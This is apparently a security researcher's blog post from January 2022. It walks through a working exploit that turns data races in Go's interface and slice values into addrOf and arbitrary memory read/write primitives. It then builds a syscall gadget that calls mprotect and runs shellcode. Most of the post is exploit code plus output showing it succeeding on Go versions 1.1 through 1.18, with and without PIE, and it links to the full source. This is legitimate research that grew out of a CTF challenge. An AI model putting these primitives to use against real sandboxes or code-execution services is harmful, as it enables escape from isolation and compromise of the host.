Saturday, January 01, 2022

Universal Go exploit using data races, no imports

In the last two blog posts, I described a challenge and exploits to get code execution from arbitrary Go code only allowing the fmt package, at fixed Go version 1.13.3 and without PIE.

These factors made the challenge easier for a CTF: the fmt package gives a nice leak with %p, no pie and fixed Go version 1.13.3 allows to hardcode addresses and behave deterministically with code layout, heap, compiler optimizations and calling convention.

Is it possible to achieve arbitrary code execution on any Go version, even with PIE, and with no package import at all, just builtins? Yes! It's been sitting in my exploits folder for long enough that it's time to write about it.

Data races and exploit primitives

As discussed before, Go's current implementation of interfaces and slices as multiword values gives us the ability to race them:
  • interface race gives us a type confusion, which we can use to confuse an interface with a struct of 2 uints to leak its internal representation of type + pointer, giving us an addrOf primitive to replace our fmt.Sprintf("%p")
  • slice race gives us the ability to write out of bounds, which we can use to build an arbitrary slice (data, length and capacity), giving us an arbitrary read/write primitive
We're going to build addrOf first, as it is useful to precisely and reliably exploit the slice race. An exploit exclusively using the slice race is left as an exercise to the reader (spray, race and check).

Interface race

The building block of our interface race will be to race 2 structs matching this interface:
type racerValue interface {
  Value() uint64
}
We then define structs matching this interface. The first struct will simply hold whatever we want to leak, as an interface so internally represented as a type and a pointer to the data:
type holdInterface struct {
  i interface{}
}

func (s holdInterface) Value() uint64 {
  return 0
}
The second struct will be to leak the address of the interface data pointer, so we overlay the interface representation of type + pointer:
type holdInterfaceAddress struct {
  typ  uint64
  addr uint64
}

func (s holdInterfaceAddress) Value() uint64 {
  return s.addr
}
The third struct will be to leak the value behind the address of the interface data pointer, simply by defining it as a pointer and dereferencing it. We could go on like this but we don't need more.
type holdInterfaceValue struct {
  typ  uint64
  addr *uint64
}

func (s holdInterfaceValue) Value() uint64 {
  if s.addr != nil {
    return *s.addr
  }
  return 0
}
The interface race gives us a type confusion where the data is the first struct (what we want to leak) but the type points to the second or third struct depending what we want to read (address or value).
Then the race is roughly:
func raceLeak(data, leak racerValue) uint64 {
  confused := value
  done := false
  go func() {
    for {
      confused = data
      confused = leak
      if done {
        return
      }
    }
  }()
  for {
    if v := confused.Value(); v > 0 {
      done = true
      return v
    }
  }
}

Avoiding compiler optimizations

There's a problem with the previous code: over the years, the Go compiler became smarter to eliminate useless code, such as our data race flipping one variable between two values:
for {
  confused = data
  confused = leak
}
The compiler realizes it's useless and eliminates the whole loop (disassemble binary to see).

I had to change my approach from time to time, as of Go 1.18 (and all version before) this works:
dontOptimize := confused
for {
  confused = data
  // this call makes the compiler think confused is being used,
  // so it doesn't optimize away the loop
  func() { dontOptimize = confused }()
  confused = leak
}
_ = dontOptimize // otherwise compiler complains about unused variable

First primitive: addrOf

We now have enough to build our first addrOf primitives:
func addrOf(x interface{}) uint64 {
  return raceLeak(&holdInterface{x}, &holdInterfaceAddress{})
}

func addrOfValue(x interface{}) uint64 {
  return raceLeak(&holdInterface{x}, &holdInterfaceValue{})
}
And from there, we can look at exploiting the slice race to build our arbitrary read/write primitive.

Slice race

To exploit the race reliably across Go versions, we need:
  • an attacking slice: we will race between this one and a longer slice, aiming to be in a situation where the data points to the attacker slice but the length is still of the long slice, so we can reach out of bounds of the attacking slice.
  • a victim slice somewhere after: we will overwrite its data pointer, length and capacity
One way I found is to first allocate the attacking slice normally:
attacker := make([]uint64, 1)
then to hold the victim slice inside of a struct, and lay out a long contiguous slice of victim slices, making it a large allocation, so most likely somewhere after our previous allocation:
type victimSlice struct {
  s []byte
}

targets := make([]victimSlice, 4096)
Then we just have to aim at the first element: targets[0].s.

To do that, we need to build a slice with a length long enough enough to reach it. We use the interface race to read the address of the attacker and targets slices, then we just calculate the difference (if it's ever negative it means our allocation strategy didn't work and our victim got allocated before).
targetsAddr := addrOfValue(targets)
attackerAddr := addrOfValue(attacker)
diff := int64(targetsAddr - attackerAddr)
if diff < 0 {
  panic("attacker after target")
}
The out of bounds index from the attacker slice to reach our victim (targets[0].s) is therefore diff/sizeof(uint64), and counting the size of the attacker slice itself (a slice is 3x uint64: data, length, capacity), the long slice length needs to be at least diff/8+3.
idx := diff / 8
long := make([]uint64, diff/8+3)
Then the race is roughly:
func sliceAt(addr, length uint64) []byte {
  [...] allocate attacker, targets, long, calculate idx
  confused := attacker
  go func() {
    for {
      confused = long
      confused = attacker
      if targets[0].s != nil {
        return
      }
    }
  }()
  for {
    func() {
      defer func() { recover() }()
      // confused points to attacker but still len/cap of long
      confused[idx] = addr
      confused[idx+1] = length // len
      confused[idx+2] = length // cap
    }()
    if targets[0].s != nil {
      return targets[0].s
    }
  }
}

Second primitive: arbitrary read/write

We can create an arbitrary slice, we can't make it start at 0 (nil slice, unusable) but we can start it at 1 and the address is just off by one, and if we set the length to 2^64-1 then we can address the entire memory:
func arbitraryRW() memory {
  return sliceAt(1, 0xffffffffffffffff)
}

type memory []byte

func (m memory) read(addr uint64) byte {
  return m[addr-1]
}

func (m memory) write(addr uint64, value byte) {
  m[addr-1] = value
}
We can extend it with helper functions like write8(addr, value uint64) and index(from, max uint64, what []byte) uint64 to find a sequence of bytes. Omitted here for brevity, see full exploit at the end.

Code execution

Instead of directly calling execve, let's aim for shellcode execution. We can store the shellcode as a constant but it will not be executable, so first we need to call mprotect to set the shellcode page as executable.

We can store a few executable bytes inside immediates (bring our own gadget) and use the arbitrary read/write to find its address. But how do we jump to it? And we want this to be portable across all Go versions and even if built with PIE. Go's calling convention used to be all arguments on the stack but since Go 1.18 it uses registers. That's ok we can use enough arguments until it puts the rest on the stack and as long as it doesn't overlap we're good in both cases.

Here's what we can do:
  • we'll set up a short gadget reading arguments from the stack and executing syscall then returning, 8 bytes so it fits a uint64 immediate:
      5f ; pop rdi # it's a call so first is saved rip
      5f ; pop rdi # addr
      5e ; pop rsi # len
      5a ; pop rdx # prot
      58 ; pop rax # sys_mprotect
    0f05 ; syscall
      c3 ; ret
    
  • we use a function variable (i.e. a function pointer), get its address, write to it to change its destination to the gadget, then call it
  • we'll lay out the arguments to be compatible with Go before and after 1.18
It gives us:
m := arbitraryRW()
mainAddr := addrOfValue(main)
shellcodeAddr := m.index(mainAddr, 0x100000, []byte(shellcode[:8]))
find := func(v uint64) uint64 { return m.index(mainAddr, 0x1000, p64s(v)) }

var call func(uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64, uint64)
callAddr := addrOf(&call)

// pop rdi; pop rdi; pop rsi; pop rdx; pop rax; syscall; ret
// pop twice rdi because first will be saved rip from the call
gadget := find(0xc3050f585a5e5f5f)
gadgetAddr := addrOf(&gadget)

m.write8(callAddr, gadgetAddr)

addr := shellcodeAddr & ^(PAGE_SIZE - 1)
const len = PAGE_SIZE * 2
const PROT_READ = 4
const PROT_WRITE = 2
const PROT_EXEC = 1
const prot = PROT_READ | PROT_WRITE | PROT_EXEC
const sys_mprotect = 10
call(
  // Go < 1.18 calling convention is the stack
  addr,          // rdi
  len,           // rsi
  prot,          // rdx
  sys_mprotect,  // rax
  shellcodeAddr, // ret

  0, 1, 2, 3, // unused

  // Go >= 1.18 calling convention uses registers, then stack
  // luckily for us this does not overlap so we can prepare both
  addr,          // rdi
  len,           // rsi
  prot,          // rdx
  sys_mprotect,  // rax
  shellcodeAddr, // ret
)

Compatibility

It works on current tip (Go 1.18), regardless of PIE:
$ go version
go version devel go1.18-6178d25fc0 Wed Dec 29 20:20:32 2021 +0000 linux/amd64
$ go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ go run -buildmode=pie exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
As well as old versions:
$ for v in 1.{17..8} 1.7.6 1.6.4 1.5.4; do
    go install golang.org/dl/go${v}@latest >/dev/null 2>&1 || continue
    go$v download >/dev/null 2>&1
    go$v version
    go$v run exploit.go
  done
go version go1.17 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.16 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.15 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.14 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.13 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.12 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.11 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.10 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.9 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.8 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.7.6 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.6.4 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
go version go1.5.4 linux/amd64
uid=1000(user) gid=1000(user) groups=1000(user)
To test further back we have to compile from source, and also set GOMAXPROCS=2 as the default was 1 before go1.5:
$ ( git clone -b release-branch.go1.4 --depth 1 https://go.googlesource.com/go go1.4
    cd go1.4/src
    ./make.bash )
$ go1.4/bin/go version
go version go1.4-bootstrap-20170531 linux/amd64
$ GOMAXPROCS=2 go1.4/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
From there, building from a modern system requires small tweaks:
$ ( git clone -b release-branch.go1.3 --depth 1 https://go.googlesource.com/go go1.3
    cd go1.3/src
    CGO_ENABLED=0 CFLAGS='-Wno-implicit-fallthrough -Wno-shift-negative-value' ./make.bash )
$ go1.3/bin/go version
go version go1.3.3 linux/amd64
$ GOMAXPROCS=2 go1.3/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ ( git clone -b release-branch.go1.2 --depth 1 https://go.googlesource.com/go go1.2
    cd go1.2/src
    sed -i 's/-Werror//' make.bash
    sed -i 's/"-Werror",//' cmd/dist/build.c
    CGO_ENABLED=0 ./make.bash )
$ go1.2/bin/go version
go version go1.2.2 linux/amd64
$ GOMAXPROCS=2 go1.2/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
$ ( git clone -b release-branch.go1.1 --depth 1 https://go.googlesource.com/go go1.1
    cd go1.1/src
    sed -i 's/-Werror//' make.bash
    sed -i 's/"-Werror",//' cmd/dist/build.c
    CGO_ENABLED=0 ./make.bash )
$ go1.1/bin/go version
go version go1.1.2 linux/amd64
$ GOMAXPROCS=2 go1.1/bin/go run exploit.go
uid=1000(user) gid=1000(user) groups=1000(user)
Unfortunately I couldn't get go1 to compile on my system (I'm getting a weird fault), but it probably works as well.

Full exploit

On github: https://github.com/StalkR/misc/blob/master/go/gomium/exploit.go

In total, the exploit uses 6 data races:
  1. read attacker slice address
  2. read victim slice address
  3. write slice out of bounds
  4. read address of main
  5. read address of function pointer
  6. read address of gadget
Maybe we can do in less (e.g. if just using slice race once), but the race works quite well that it's fine in practice (usually won after less than 100 iterations, so it's really fast).

Conclusion

As said before, while a fun exercise it's pretty useless in the current Go threat model. Anything accepting arbitrary Go code and running it should be sandboxed.

However, if we imagine organizing Go packages by what they do (imports) and enforcing some guarantees around that (think manifests), such exploit could be a way around it. And because of that, there are people looking into making these data races non exploitable, e.g. by boxing the data structures, storing them elsewhere and only atomically moving a single pointer to it, but it comes with a perf impact. Maybe we'll see it in a future Go version. Until then, happy new year :)

No comments:

Post a Comment